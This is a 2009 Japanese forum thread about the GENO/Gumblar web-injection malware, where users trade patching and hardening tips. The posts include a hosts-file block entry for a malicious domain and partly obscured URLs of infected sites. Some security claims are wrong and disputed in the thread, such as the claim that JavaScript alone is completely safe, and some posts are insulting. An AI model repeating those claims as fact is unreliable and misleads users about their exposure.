295名無しさん@お腹いっぱい。:2009/05/29(金) 21:57:01
あああすみませんレス読んだらちゃんと最新版ってありました
296名無しさん@お腹いっぱい。:2009/05/29(金) 22:11:04
>Vistaの人はは

コレなんで直さないの
297名無しさん@お腹いっぱい。:2009/05/29(金) 22:11:58
298名無しさん@お腹いっぱい。:2009/05/29(金) 22:14:18
>>296
文章の検討が十分でないことを意識してもらい、
気を緩めず、緊張感を持って読んでもらうため
299名無しさん@お腹いっぱい。:2009/05/29(金) 22:15:31
チェッカーの人は一応まだ生きてたんだなw
微妙に記述が変わってる
300名無しさん@お腹いっぱい。:2009/05/29(金) 22:25:18
>>296
りすぺくつですよ
301名無しさん@お腹いっぱい。:2009/05/29(金) 22:27:19
しつこくテンプレやってたのはアフィチェッカーの奴なのか
302名無しさん@お腹いっぱい。:2009/05/29(金) 22:27:36
検出できるの今avastだけなの?
303名無しさん@お腹いっぱい。:2009/05/29(金) 22:41:18
次スレ立てる人テンプレだけでもトリつけて4辺りにレジストリ改変させようとする
キチガイが常駐してることも書いといたほうがいいかも
304名無しさん@お腹いっぱい。:2009/05/29(金) 22:46:59
GENOウイルスチェッカーも個人的にはウイルと同等
アフィ野郎は死ね
305名無しさん@お腹いっぱい。:2009/05/29(金) 22:48:37
ウイル
306名無しさん@お腹いっぱい。:2009/05/29(金) 22:49:28
>>301
それを知る為にもテンプレ書く奴はトリつけて欲しいよな
307名無しさん@お腹いっぱい。:2009/05/29(金) 23:01:00
テンプレでチェッカー外そうとしてるのに
アフィチェッカーの奴なわけない
308名無しさん@お腹いっぱい。:2009/05/29(金) 23:08:41
そろそろアフィチェッカーはテンプレから外すべきだな
で、身元割れ
なにしれーっとアフィ仕込んでやがる
309名無しさん@お腹いっぱい。:2009/05/29(金) 23:09:37
前スレで外したのにわざわざ復活さしたからな
310名無しさん@お腹いっぱい。:2009/05/29(金) 23:10:21
復活さした
311名無しさん@お腹いっぱい。:2009/05/29(金) 23:12:59
チェッカーの中の人もアンチ(っていうかアフィ厨)も必死
312名無しさん@お腹いっぱい。:2009/05/29(金) 23:19:00
どうやら、このスレには海外の方が多いみたい
313名無しさん@お腹いっぱい。:2009/05/29(金) 23:20:49
とにかくせめてフラッシュの記述だけは修正しないと
これで大丈夫だと思って引っかかるIEの奴がいるだろ
アフィチェッカいい加減直せよ
314名無しさん@お腹いっぱい。:2009/05/29(金) 23:25:01
PCJ○PANに対策が載っていたけど、目新しい事は載っていなかった。まとめに書いてあることとだいたい同じ。
315名無しさん@お腹いっぱい。:2009/05/29(金) 23:25:30
googleだと「コンピュータに損害を与える可能性がある」と表示してくれるけど
Yahooは何も表示されないから怖くて使えない
316名無しさん@お腹いっぱい。:2009/05/29(金) 23:30:53
現verのノートンにnortonセーフウェブなる保護機能(検索エンジン結果の拡張対応)が付いてるが
あれは使い物になるのか?
有効にしていると常時、ノートン鯖にアクセスするから重くなるだけのような気がするんだが
317名無しさん@お腹いっぱい。:2009/05/29(金) 23:33:49
少しはね
318名無しさん@お腹いっぱい。:2009/05/29(金) 23:51:33
>>316
気休め程度
たぶんリストはローカルに持ってるとおもう
319172:2009/05/30(土) 00:45:11
>>196
Vista UAC回避が明記されてるexploitツールも見かけた


Adobe Readerに関してはバックグラウンドDLも無効にする
320名無しさん@お腹いっぱい。:2009/05/30(土) 01:08:09
ネットをやめれば万事解決
321名無しさん@お腹いっぱい。:2009/05/30(土) 01:10:53
>>319
Macおすすめ
322名無しさん@お腹いっぱい。:2009/05/30(土) 01:15:05
ウィルス如きが怖いようならPCは使わない事だ
323名無しさん@お腹いっぱい。:2009/05/30(土) 01:21:54
404、403エラーページに仕込まれ始めたって話ホント?
324名無しさん@お腹いっぱい。:2009/05/30(土) 01:23:30
どんどん脈絡なくウイルス全般の話して不安を煽るやつがおるのか
325名無しさん@お腹いっぱい。:2009/05/30(土) 01:47:45
>>323
それマジソース
どうせカスタムエラーページだと思うけども
326名無しさん@お腹いっぱい。:2009/05/30(土) 02:33:50
>>325

ttp://questionbox.jp.msn.com/qa4998383.html?ans_count_asc=2
>なお、これはサーバーの出す404エラー表示にも仕込まれておりましたので、
>管理者権限にてWEBルートより上位ディレクトリのcfファイルが書き換えられた可能性があります。

カスタム可能サーバなのかな?
327名無しさん@お腹いっぱい。:2009/05/30(土) 02:36:36
追記です
話題になってるのはこのサイトみたい

h●●p://www.mutsumi-house.com/aindex.html
328名無しさん@お腹いっぱい。:2009/05/30(土) 02:46:56
うわあ…
329名無しさん@お腹いっぱい。:2009/05/30(土) 03:03:57
404だしてもGenoみあたらないんだが
330名無しさん@お腹いっぱい。:2009/05/30(土) 06:12:40
>>329
ちゃんと上で指定されてるサーバーいったか?
331名無しさん@お腹いっぱい。:2009/05/30(土) 06:27:25
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /aindex.htmleee was not found on this server.</p>
</body></html>
332名無しさん@お腹いっぱい。:2009/05/30(土) 07:17:32
例のGENOチェッカーサイトはamazonnアソシエイトに通報すれば普通に処罰されるよ

てかなんでお前ら通報しないの?死ねよ
333名無しさん@お腹いっぱい。:2009/05/30(土) 07:20:35
334名無しさん@お腹いっぱい。:2009/05/30(土) 09:06:55
>>332
自分でやれよ
335名無しさん@お腹いっぱい。:2009/05/30(土) 10:46:58
>>334
たった一言なのにすごく説得力あるなw
336名無しさん@お腹いっぱい。:2009/05/30(土) 11:31:32
asahi.com(朝日新聞社)

新マルウエア「GENOウイルス」蔓延に注意(1/3ページ)
ttp://www.asahi.com/digital/digitre/TKY200905250299.html
337名無しさん@お腹いっぱい。:2009/05/30(土) 11:39:01
>>332
え アソシエイト が仕込まれてるの?
知らずにやってた・・・
338名無しさん@お腹いっぱい。:2009/05/30(土) 12:35:49
339名無しさん@お腹いっぱい。:2009/05/30(土) 13:03:54
アクセス数がかなり多く、サーバー維持が大変です。
差し支えなければ下記アフィリエイトリンクのご利用よろしくお願いします。
340名無しさん@お腹いっぱい。:2009/05/30(土) 13:21:52
>>337
geno2chtc-22

-22って付いてるところがアフィの元。
geno2chtcね。
341名無しさん@お腹いっぱい。:2009/05/30(土) 13:31:10
■ adobe flashplayerを最新版に更新
  http://fpdownload.macromedia.com/get/flashplayer/current/install_flash_player.exe
だけではIEのflash更新されません
当サイトを見るだけで十分とか書いておきながら
一番大事な所で嘘書いてるクソサイト
342名無しさん@お腹いっぱい。:2009/05/30(土) 13:34:55
iframeってサイトみただけでクリックしたことになるんですよね?
343名無しさん@お腹いっぱい。:2009/05/30(土) 13:38:51
>>332
何か規約に反したことしてるのか?
344名無しさん@お腹いっぱい。:2009/05/30(土) 13:55:26
暇だからAmazonに通報してみるか
345名無しさん@お腹いっぱい。:2009/05/30(土) 14:01:14
>>342
サイトみたときに同時に読み込まれるけど
クリックはしないとおもう
346名無しさん@お腹いっぱい。:2009/05/30(土) 14:04:03
http://geno.2ch.tc/

GENOウイルスチェッカー
危険度4%
347名無しさん@お腹いっぱい。:2009/05/30(土) 14:05:28
>>344
どんな規約に違反してるの?
そもそもアマゾンって踏んだ後に購入しないと金が入らない仕組みじゃなかったっけ?
348名無しさん@お腹いっぱい。:2009/05/30(土) 14:07:14
>>344
頼んだ。期待している
349名無しさん@お腹いっぱい。:2009/05/30(土) 14:07:42
■ adobe flashplayerを最新版に更新
  http://fpdownload.macromedia.com/get/flashplayer/current/install_flash_player.exe
だけではIEのflash更新されません
当サイトを見るだけで十分とか書いておきながら
一番大事な所でデタラメ書いてるクソサイト
350名無しさん@お腹いっぱい。:2009/05/30(土) 14:14:39
ASAHIネットのユーザーサイトでスクリプト埋め込みを
確認したんだけどASAHIネットの通報先がイマイチわからん

eval unescapeでぐぐってたら出てきた
gumblar2.5個(1つできそこない)、martuz1つ確認
www●ne●jp/asahi/travel/net/sub5.html
351名無しさん@お腹いっぱい。:2009/05/30(土) 14:51:29
>>350
whoisでは
remarks: Email address for spam or abuse complaints : mailto:[email protected]
ってなってるけど、このアドレス死んでるの?
352名無しさん@お腹いっぱい。:2009/05/30(土) 15:14:48
こんなスレまだあったんだw
353名無しさん@お腹いっぱい。:2009/05/30(土) 15:18:26
ニートはアフィとか嫌いだよな
世界はタダで俺に奉仕しろってキチガイすぎるぜ
354名無しさん@お腹いっぱい。:2009/05/30(土) 15:25:53
アフィ嫌いじゃないよ
おれ自身アフィのおかげで助かってる身だし
355名無しさん@お腹いっぱい。:2009/05/30(土) 15:50:37
今頃騒いでる奴は馬鹿。
356名無しさん@お腹いっぱい。:2009/05/30(土) 16:23:45
アフィはあっても無くてもどっちでもいいだろ
問題は中身
357名無しさん@お腹いっぱい。:2009/05/30(土) 16:53:21
>>350
おk、サーバー管理者宛に送っとくよ
358名無しさん@お腹いっぱい。:2009/05/30(土) 17:04:07
>>350-351
朝日ネットの技術連絡担当者のメールアドレスに送っといた。
359名無しさん@お腹いっぱい。:2009/05/30(土) 17:31:21
>>356
叩きたいだけの能なし基地外にそんな正論言っても無駄
チェッカー使わないから別にいいけどね
360名無しさん@お腹いっぱい。:2009/05/30(土) 17:34:21
>>357-358
thx
361名無しさん@お腹いっぱい。:2009/05/30(土) 17:46:51
アフィ云々より運用板での発言が気になる
アフィなんかどこでもしてるし別に問題ない
362名無しさん@お腹いっぱい。:2009/05/30(土) 17:53:00
日本語通じない人に何言っても駄目っす
ID出ないから自演しまくりだし
363名無しさん@お腹いっぱい。:2009/05/30(土) 17:53:57
GENO関連なので、こちらに誘導されてきました。

GENOウイルスにかかって
パソコンをリカバリしてからちょっとおかしい?ので
質問させてください。

ウインドウズXPで、機種はレッツノートです。

ローカルディスク(C)の中身って、
普通、
Documents and Settings
Program Files
util
WINDOWS
くらいですよね?

それ以外に、なんか長い英数字の並んだ名前のフォルダが存在するのって
おかしいですか?
5558de〜とかって30文字くらいのフォルダ名です。
多分前はそんなフォルダなかったと思うんですが…。
ウイルスの駆除がまだできてなかったってことでしょうか?
364名無しさん@お腹いっぱい。:2009/05/30(土) 17:55:32
■ adobe flashplayerを最新版に更新
  http://fpdownload.macromedia.com/get/flashplayer/current/install_flash_player.exe
だけではIEのflash更新されません
当サイトを見るだけで十分とか書いておきながら
一番大事な所でデタラメ書いてるクソサイト
こいつのせいで蔓延してんだろ
365名無しさん@お腹いっぱい。:2009/05/30(土) 17:58:44
ようやく修正したなww
366名無しさん@お腹いっぱい。:2009/05/30(土) 18:00:36
■ Opera(→ダウンロード)でプラグイン、Javaをオフ。(JavaScriptのみでは全く安全です。)
こいつ技術者じゃないんでないの
あまりに短絡的
367名無しさん@お腹いっぱい。:2009/05/30(土) 18:08:20
これ、どういう基準でチェックしてんの???
javascriptの数が基準?

おれんとこの富士通のttp://azby.nifty.com/
101パーセント危険判定されてわろた。
んで、ttp://azby.nifty.com/light/にしたら一挙に8パーセントで安全になったんだけどw

他では笑いのネタになってるぞこれw
368名無しさん@お腹いっぱい。:2009/05/30(土) 18:13:48
>>363
OSアップデート時のごみが残ってるだけだとおもう
369名無しさん@お腹いっぱい。:2009/05/30(土) 18:18:38
>>363
そんなもん腐るほどあるわ!
370名無しさん@お腹いっぱい。:2009/05/30(土) 18:23:45
GENOチェッカーにある
■ adobe flashplayerを最新版に更新

  IE用のアップデーターです。↓も必ずインストールしてください。 05/30更新 重要!
  fpdownload.macromedia.com/get/flashplayer/current/licensing/win/install_flash_player_10_active_x.exe

この下のexeは更新して大丈夫だよね?
なんかexeが直リンされてると怖い
371名無しさん@お腹いっぱい。:2009/05/30(土) 18:25:35
372名無しさん@お腹いっぱい。:2009/05/30(土) 18:25:50
>>363
一応フォルダの中身きいとこうか
373名無しさん@お腹いっぱい。:2009/05/30(土) 18:26:14
あのサイト見るな
不十分サイト
1修正案
■ adobe readerを最新版にアップデートする
ttp://get.adobe.com/jp/reader/
 とりあえず最新版にしましょう。
 インストール後本体をアップデートしておく事
 adobe readerを開いて ヘルプ→アップデートの有無をチェック
■ adobe flashplayerを最新版に更新
ttp://www.adobe.com/go/getflashplayer_jp

以上でGENOは防げるが亜種等のため以下推奨
■ acrobat javascriptをオフに
  adobe readerを開いて メニュー→編集→環境設定→javascript→acrobat javascriptを使用のチェックを外す
■ブラウザでスクリプト使用を基本無効に設定
  FirefoxにてNoscriptを利用
  (Operaでflashオフでもおk([F12]を押す→[プラグインを有効にする]のチェックを外す)
  (sleipnir、IEでも上手に設定するとなんとかなります)

優先度低
■ Vistaの人ははUACをONにする
■ hostsファイル書き換え
  hostsファイルに以下の行を追加
  127.0.0.1 martuz.cn
  hostsファイルの在処
  Windows XPの場合→「C:\WINDOWS\system32\drivers\etc」
  Windows 2000の場合→「C:\WINNT\system32\drivers\etc」
  Windows 95/98/MEの場合→「C:\Windows」
374名無しさん@お腹いっぱい。:2009/05/30(土) 18:29:44
100%で安全とか頭おかしいでしょ
普通は修正する
375名無しさん@お腹いっぱい。:2009/05/30(土) 18:34:17
とにかく次スレで外す
376363:2009/05/30(土) 18:41:24
皆様返答ありがとうございます。
大丈夫そうということで、とりあえず安心しました。
どうもありがとうございました。

>>372
フォルダの中身はsupportとかupdateというフォルダと、
他本当にファイルがいっぱいで書ききれないです…。
377名無しさん@お腹いっぱい。:2009/05/30(土) 18:44:35
>>363
それは、WindowsUpdate等の作ったファイルなので消しちゃだめ。
378名無しさん@お腹いっぱい。:2009/05/30(土) 18:46:38
>>370
IEだとめんどくさい処理がいるからそのリンクでいいよ
379名無しさん@お腹いっぱい。:2009/05/30(土) 18:49:43
■ adobe flashplayerを最新版に更新
ttp://www.adobe.com/go/getflashplayer_jp
380名無しさん@お腹いっぱい。:2009/05/30(土) 18:51:32
>>376
自分の知ってる限りだと
winupdate関連以外にもcreativeのサウンドカード(わけのわからないファイルがsystemにくいこむ)や一部のソフトの履歴としても
似たようなものが作られる事があるよ
381名無しさん@お腹いっぱい。:2009/05/30(土) 18:52:30
チェッカー叩きってなぜか集団で来て集団で去っていくね
よっぽど離れてても心が一致団結した人たちなんだね
382名無しさん@お腹いっぱい。:2009/05/30(土) 18:53:54
叩きってねえ
成長しろよいつまでフラッシュのver嘘書くの
383名無しさん@お腹いっぱい。:2009/05/30(土) 18:54:00
自演
384名無しさん@お腹いっぱい。:2009/05/30(土) 18:55:14
なにをいまさら
つうか全部おれの自演
385名無しさん@お腹いっぱい。:2009/05/30(土) 18:56:33
うお。チェッカー修正キタ
ありがてえ
386名無しさん@お腹いっぱい。:2009/05/30(土) 18:57:25
flashの記述はましになってよかったね
叩きのおかげか
387名無しさん@お腹いっぱい。:2009/05/30(土) 18:57:34
感染してるとWindows Updateに接続できないって事は
言い換えると接続できれば感染してないってことなのでしょうか
388名無しさん@お腹いっぱい。:2009/05/30(土) 18:59:11
そうかもしれないしそうじゃないかもしれない
ウイルス全般に言えるような話は他でやってね
389名無しさん@お腹いっぱい。:2009/05/30(土) 19:03:01
>特に2ちゃんねるで様々な情報が錯綜していますが、異常に警戒する必要はありません。
>今回の件に関してはこのサイトに従って対策を施せば、大事に至ることはまずないでしょう。
>wiki、2ちゃんねるの情報は、誰でも書き込みできてしまうので、信憑性に欠き、初心者の方は惑わされやすいです。
>そこで、情報の取捨選択に困ってる人のために当サイトを見るだけで十分なようにこのサイトは作られました。

嘘情報ずっと載せてた危険サイトの癖に
390名無しさん@お腹いっぱい。:2009/05/30(土) 19:06:16
チェック先のソースを表示して、
感染部分を赤字で教えてくれる他のチェッカーの方が断然使いやすかった。
391名無しさん@お腹いっぱい。:2009/05/30(土) 19:14:17
>>379
おい更新できねーじゃねーか糞が
IEが更新中止しやがる
392名無しさん@お腹いっぱい。:2009/05/30(土) 19:28:27
感染サイトを確実に見極めるにはGENOチェッカーでは役不足ですね
私は独自の対策より99.999%、感染か未感染か確かめられるのでその方法でサイト検証はしました
今後、変異したGENOウイルスが出たとしても99.999%防御できるだろうと確信しています
393名無しさん@お腹いっぱい。:2009/05/30(土) 19:29:26
>>392
急にどうしたんだ?
394名無しさん@お腹いっぱい。:2009/05/30(土) 19:31:40
チェッカー、0.4%とか更に細かくなってるんだが気のせいかw?
395名無しさん@お腹いっぱい。:2009/05/30(土) 19:34:43
ブラウザは用途に応じてIE/firefox/operaで使い分けるのが最強だな
〜だから駄目って事はない
396名無しさん@お腹いっぱい。:2009/05/30(土) 19:35:26
自演が痛すぐる
397名無しさん@お腹いっぱい。:2009/05/30(土) 19:36:52
IDない板で何言っても見苦しい事になるだけ
398名無しさん@お腹いっぱい。:2009/05/30(土) 19:37:31
>>393
なぜなら彼もまた特別な存在だからです。
399名無しさん@お腹いっぱい。:2009/05/30(土) 19:38:01
>>1-1000
全て俺の自演(の予定)
400名無しさん@お腹いっぱい。:2009/05/30(土) 19:39:18
>>393
GENOチェッカーは曖昧な表現のため慎重派は0%以外を危険とみなしてしまうので使い勝手が悪いのです
ウイルス検出ソフトで例えると「誤検出」した状態と同じです

GENOチェッカーも、感染しているか、否かを判断できるなら使えるのですがとても残念です
401名無しさん@お腹いっぱい。:2009/05/30(土) 19:41:45
>>400
良いこと言った
402名無しさん@お腹いっぱい。:2009/05/30(土) 19:43:52
突然クソ重くなったんで感染したか!?と思ったら
noscriptが重かっただけだったでござる
403名無しさん@お腹いっぱい。:2009/05/30(土) 19:46:02
■ Opera(→ダウンロード)でプラグイン、Javaをオフ。(JavaScriptのみでは全く安全です。)5/30更新
  1.[F12]を押す→[プラグインを有効にする]のチェックを外す。
  2.[F12]を押す→[javaを有効にする]のチェックを外す。
  sleipnir、IEでも上手に設定するとなんとかなりますが、難しいです。
  この方法だと多くのサイトで利用されているJavaScriptを犠牲にせず、簡単に安全なブラウジングが実現できます。

これってどういう事なんだろう
javascriptって危険なんじゃなかったっけ?
404名無しさん@お腹いっぱい。:2009/05/30(土) 19:48:03
ただのインチキ情報だろ
405名無しさん@お腹いっぱい。:2009/05/30(土) 19:50:59
>>402
火狐は相変わらずメモリリーク問題がある
406 ◆XcxlmnqGqU :2009/05/30(土) 19:57:35
>>403
全く安全
多くのウイルスがJavaScriptを介して、pdf、swf等を読み込ませるからJavaScriptが問題だと勘違いされがちですが、
javascript単体にはローカルファイル操作、レジストリ改変等を行う機能は存在しません
よってその対処法を導入していれば持続的な被害に合うことは一切ありません




>>404
雑魚は黙ってなさい
407名無しさん@お腹いっぱい。:2009/05/30(土) 19:59:52
Javaなんてインストールされてないだろ
そんなんで安全ならこんなに問題になんてならない
408名無しさん@お腹いっぱい。:2009/05/30(土) 20:01:07
Adobe Flash Player のバージョンテスト(最新10,0,22,87)
ttp://www.adobe.com/jp/support/flashplayer/ts/documents/tn_15507.htm
409名無しさん@お腹いっぱい。:2009/05/30(土) 20:03:33
Javaは関係ないだろ?
そんなことよりAdobe製品の対策しとけば問題ないだろ
410名無しさん@お腹いっぱい。:2009/05/30(土) 20:04:58
Javaの脆弱性が突かれたって言うのか
全然Sunは対応してないようだが
411名無しさん@お腹いっぱい。:2009/05/30(土) 20:07:26
>>406
Sunに報告してね
412名無しさん@お腹いっぱい。:2009/05/30(土) 20:13:13
>>406
まじでjavaの脆弱性なら報告してくれよ
間違いなら迷惑だから訂正して欲しい
413名無しさん@お腹いっぱい。:2009/05/30(土) 20:26:11
それopera関係ないワナ
414名無しさん@お腹いっぱい。:2009/05/30(土) 20:27:06
operaもjavaも関係ない
415名無しさん@お腹いっぱい。:2009/05/30(土) 20:29:27
ウソクソ情報垂れ流してまじいいかげんにしてほしい
416名無しさん@お腹いっぱい。:2009/05/30(土) 20:37:04
50,727じゃなかったんだけど…おわ……た
417名無しさん@お腹いっぱい。:2009/05/30(土) 20:55:40

  / ̄ ̄ ̄ /  /''7 ./''7        / ̄/  /''7
 ./ ./ ̄/ /  /__/ / /  ____    ̄  / /
 'ー' _/ /   ___ノ /  /____/   ___ノ /
   /___ノ   /____,./         /____,./

   _ノ ̄/ / ̄/  /''7 / ̄ ̄ ̄/   / ̄/             /'''7'''7
/ ̄  /    ̄  / /    ̄ フ ./   /  ゙ー-;   ____   / / /._
 ̄/ /     ___ノ /   __/  (___  /  /ー--'゙ /____/ _ノ /i  i/ ./
 /__/   /____,./   /___,.ノゝ_/ /_/           /__,/ ゝ、__/
418名無しさん@お腹いっぱい。:2009/05/30(土) 20:56:10
yahoo!JAPANトップページのニュース・・・
国交省岐阜国道事務所が感染してたのってもしかしてGENO?
419名無しさん@お腹いっぱい。:2009/05/30(土) 20:58:59
もしかしてGENO?
420名無しさん@お腹いっぱい。:2009/05/30(土) 21:05:42
システムフォルダ内のファイルやレジストリを書き換えるのかな
ならOutpostとかComodoあたりでも防げそうだね
その他大概のHIPSで防げそうだけど
421名無しさん@お腹いっぱい。:2009/05/30(土) 21:07:21
もしかして恋?
422名無しさん@お腹いっぱい。:2009/05/30(土) 21:49:36
>>406
チェッカーのサイトの人か
修正しとけよ
JavaとJavaScript混同するなよ
雑魚は雑魚なりにがんばれ
423名無しさん@お腹いっぱい。:2009/05/30(土) 21:52:11
このスレ見てんなら間違ってるところ他にもあるから直せばいいのに
意地になってるのか
424名無しさん@お腹いっぱい。:2009/05/30(土) 22:02:05
チェッカー使えねえなwwww
425名無しさん@お腹いっぱい。:2009/05/30(土) 22:29:47
終焉。
426172:2009/05/30(土) 22:52:21
今回悪用されたAdobeの既知の脆弱性はRemote Exec Vulnだと思うけど、
Comodo Internet Securityにおいてバッファオーバーフローが発生した時点で
ブロックできることを確認したよ
427名無しさん@お腹いっぱい。:2009/05/30(土) 23:20:05
COMODO伝説
428名無しさん@お腹いっぱい。:2009/05/30(土) 23:20:14
バスターばかにすんな
429名無しさん@お腹いっぱい。:2009/05/30(土) 23:34:41
m9(^Д^)
430名無しさん@お腹いっぱい。:2009/05/30(土) 23:49:29
ttp://www.yomiuri.co.jp/national/news/20090530-OYT1T00433.htm
厚労・国交省、公式サイトのハッカー攻撃を長期間放置
431名無しさん@お腹いっぱい。:2009/05/30(土) 23:53:52
>>430
岐阜国道事務所の件までハッカーによる改ざんであるかのような記事だな
クソだな
432名無しさん@お腹いっぱい。:2009/05/30(土) 23:59:20
こういう鯖ってUNIXだっけ?
まさかWINって事は無いよな。
433名無しさん@お腹いっぱい。:2009/05/31(日) 00:32:34
どっかのオンラインゲームで、Windowsを鯖に使ってますって公言してるのを見て笑った覚えがある。
434名無しさん@お腹いっぱい。:2009/05/31(日) 00:59:48
>>370
落としたら正規のプログラムみたいだったぞ
え?それでやったけど危ないの?
435名無しさん@お腹いっぱい。:2009/05/31(日) 01:03:29
危なくないよ
糞サイトだからあんまり信じないのが良いだけ
436名無しさん@お腹いっぱい。:2009/05/31(日) 01:06:41
exe恐怖症の人は、↓で
ttp://www.adobe.com/go/getflashplayer_jp
しかし、公式のexeリンクくらいは信頼しないと何も出来なくなるぞw
437名無しさん@お腹いっぱい。:2009/05/31(日) 01:07:03
>>435
レスありがとう
安心した
438名無しさん@お腹いっぱい。:2009/05/31(日) 01:08:41
gumblar。cnは5/18に停止、martuz。cnも5/19に停止している
みたいだけど、最近感染した人はどこに誘導されてるんだろう?
439名無しさん@お腹いっぱい。:2009/05/31(日) 01:12:15
もっと前から感染してたのを最近になって気づいたってだけじゃね
440名無しさん@お腹いっぱい。:2009/05/31(日) 01:19:54
script error line 86 position 3が出るようになったけど
これはacrobat javascript関連でOKでしょうか?
441名無しさん@お腹いっぱい。:2009/05/31(日) 01:22:02
此処に書き込む感染した奴ら
確実にもう2,3個トロイ入れられトル
442名無しさん@お腹いっぱい。:2009/05/31(日) 01:25:05
そっかー
443名無しさん@お腹いっぱい。:2009/05/31(日) 01:26:57
バスターばかにすんな
444名無しさん@お腹いっぱい。:2009/05/31(日) 01:31:04
>>213
だったらやさしく教えてやれ
445名無しさん@お腹いっぱい。:2009/05/31(日) 01:32:30
>>439
そういうドラマチックな展開が好みか
現実にはありえないがね
446名無しさん@お腹いっぱい。:2009/05/31(日) 01:34:36
flashとリーダー
最新に更新しとけばいいで終了
亜種だ、別種だ?そんなのどうとでもいえるわい
447名無しさん@お腹いっぱい。:2009/05/31(日) 01:39:57
「Vistaの人ははUAC」が気になって夜も眠れません!!
ここは修正しないんですか?
448名無しさん@お腹いっぱい。:2009/05/31(日) 01:40:02
グーグルの検索結果一覧に各HPに入らない方がいいサイトには紫、大丈夫なのは緑が付いてたけど
先読み機能切ったりテンプレの対策したら色付かなくなったんですがそういうものですか。
それともウイルスが原因?
449名無しさん@お腹いっぱい。:2009/05/31(日) 01:41:50
>>359
叩いてるw
450440 :2009/05/31(日) 01:43:10
だれかおせーて
451名無しさん@お腹いっぱい。:2009/05/31(日) 01:43:43
日本語で書けカス
452名無しさん@お腹いっぱい。:2009/05/31(日) 01:44:59
>>406
皆少しはこの人を見習ってほしい
453名無しさん@お腹いっぱい。:2009/05/31(日) 01:45:29
はいはい
454名無しさん@お腹いっぱい。:2009/05/31(日) 01:46:49
>>436
ありがとう
455440 :2009/05/31(日) 01:48:02
・゚・(つд∩)・゚・
456名無しさん@お腹いっぱい。:2009/05/31(日) 01:48:36
247 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/05/29(金) 14:49:42
困った時は>>60
事前予防は>>60

こいつ通報してくる
457名無しさん@お腹いっぱい。:2009/05/31(日) 01:49:29
ウィルス直リンをマルチしてるならともかく、その程度は通報しても無駄
458名無しさん@お腹いっぱい。:2009/05/31(日) 01:50:53
>>457
そうか
ならやめとくわ
459名無しさん@お腹いっぱい。:2009/05/31(日) 01:51:21
>>452
おいおい
人を貶してる上に間違ってるだろ
460名無しさん@お腹いっぱい。:2009/05/31(日) 02:40:00
チェッカーの人お疲れ。
ありがとう、助かってるよー
461名無しさん@お腹いっぱい。:2009/05/31(日) 02:46:10
>>448誰か教えてください。
462440 :2009/05/31(日) 02:48:25
(´・ω・`)
463名無しさん@お腹いっぱい。:2009/05/31(日) 02:57:03
>>448
自分の環境では色付いてないかさっぱりらわからん。
464名無しさん@お腹いっぱい。:2009/05/31(日) 02:59:43
ないから さっぱり わからん。

さっぱり を強調したかった気持ちを汲み取ってくれ。
465名無しさん@お腹いっぱい。:2009/05/31(日) 03:16:56
念のためFlash Playerをダウンロードしてインストールしたけど、バージョンが10.0.22.87で
2月末のから変わってないじゃん。
もしかしてチェッカーの人にだまされてる?
466名無しさん@お腹いっぱい。:2009/05/31(日) 03:17:49
最新verは、10.0.22.87で合っている
467名無しさん@お腹いっぱい。:2009/05/31(日) 03:21:09
>>440
86行目に何が書いてあるの?
468名無しさん@お腹いっぱい。:2009/05/31(日) 04:00:56
対応済
Flash Player 9.0.159.0 10.0.22.87
Adobe Reader 7.1.1 8.1.4 9.1.0

最新
Flash Player 10.0.22.87
Adobe Reader 9.1.1
469名無しさん@お腹いっぱい。:2009/05/31(日) 04:02:14
元々、Flash Playerの方は問題なかったって事でそ
470名無しさん@お腹いっぱい。:2009/05/31(日) 04:06:46
>>361
運用板での発言ってなに
471名無しさん@お腹いっぱい。:2009/05/31(日) 04:11:02
Adobe Readerの対策版が出たのが3月19日
472名無しさん@お腹いっぱい。:2009/05/31(日) 04:29:58
運用板は知らんがこのスレの発言見て叩かれるのも納得
473名無しさん@お腹いっぱい。:2009/05/31(日) 04:32:40
・wiki、2ちゃんねるの情報は、誰でも書き込みできてしまうので、信憑性に欠き、初心者の方は惑わされやすいです。
お前のサイトはお前しか更新できないから信用できねえんだよww
474名無しさん@お腹いっぱい。:2009/05/31(日) 04:44:01
>>473

信用できねえんだよww ← 負け犬特有の悲壮感漂う(ry
475名無しさん@お腹いっぱい。:2009/05/31(日) 04:45:25
勝った人おつかれさまです
476251:2009/05/31(日) 04:47:08
メール来た
>継続して商品の調達に努めてまいりますが、調達不能な場合または入荷数
の関係上キャンセルをさせていただくこともございます。

2ヶ月前に予約したのにブツが無いってどういうことなの・・
477名無しさん@お腹いっぱい。:2009/05/31(日) 04:54:38
バスターが気に食わないならアフィリンク外せっての
性格が悪いな
478名無しさん@お腹いっぱい。:2009/05/31(日) 04:58:08
しかしチェッカーの人も忙しいな
ずっと書き込みしてるのか
そんな暇あったら間違い直せよ
479名無しさん@お腹いっぱい。:2009/05/31(日) 05:03:51
昨日もこのスレに100レスは書いた。
今日は200レスは書いてさっさと新スレ立てよう
480名無しさん@お腹いっぱい。:2009/05/31(日) 07:09:00
windows updateで何かそれらしいのに対応しました何ちゃらみたいなのがあった
481名無しさん@お腹いっぱい。:2009/05/31(日) 07:13:02
>>456>>60を実行したんだなw
482名無しさん@お腹いっぱい。:2009/05/31(日) 07:33:43
そんなものはない
483名無しさん@お腹いっぱい。:2009/05/31(日) 09:20:21
GENOチェッカーお気に入りから外すわw
もとから信用してないけどw
484440 :2009/05/31(日) 09:22:12
>>467
わからないですねん
script error line 86でぐぐったけどヒットしなかた
485名無しさん@お腹いっぱい。:2009/05/31(日) 09:22:55
何の恨みがあるんだか
486名無しさん@お腹いっぱい。:2009/05/31(日) 09:23:39
だからなにをどうした時に出るどれのエラーだよ
487名無しさん@お腹いっぱい。:2009/05/31(日) 09:24:52
クソサイトみて安心だと思ってたらIEで感染してエロ貯蓄がパーの人でしょ
488440 :2009/05/31(日) 09:26:43
>>486
なんか2ch5時間くらいして疲れて寝てしまって
気が付いたら出てたえらーです(`・ω・´)
489名無しさん@お腹いっぱい。:2009/05/31(日) 09:30:55
>>488
履歴をたどってみ
490名無しさん@お腹いっぱい。:2009/05/31(日) 13:01:40
>>488
スクリプトエラーでぐぐるといいかも
491名無しさん@お腹いっぱい。:2009/05/31(日) 15:56:17
おいおい何だよこの過疎っぷりは
結局一人が自演してただけなのね


哀れだなww
492名無しさん@お腹いっぱい。:2009/05/31(日) 16:18:18
>>491
感染してるぞおいwwwwwwww
>60を実行するんだwwwww
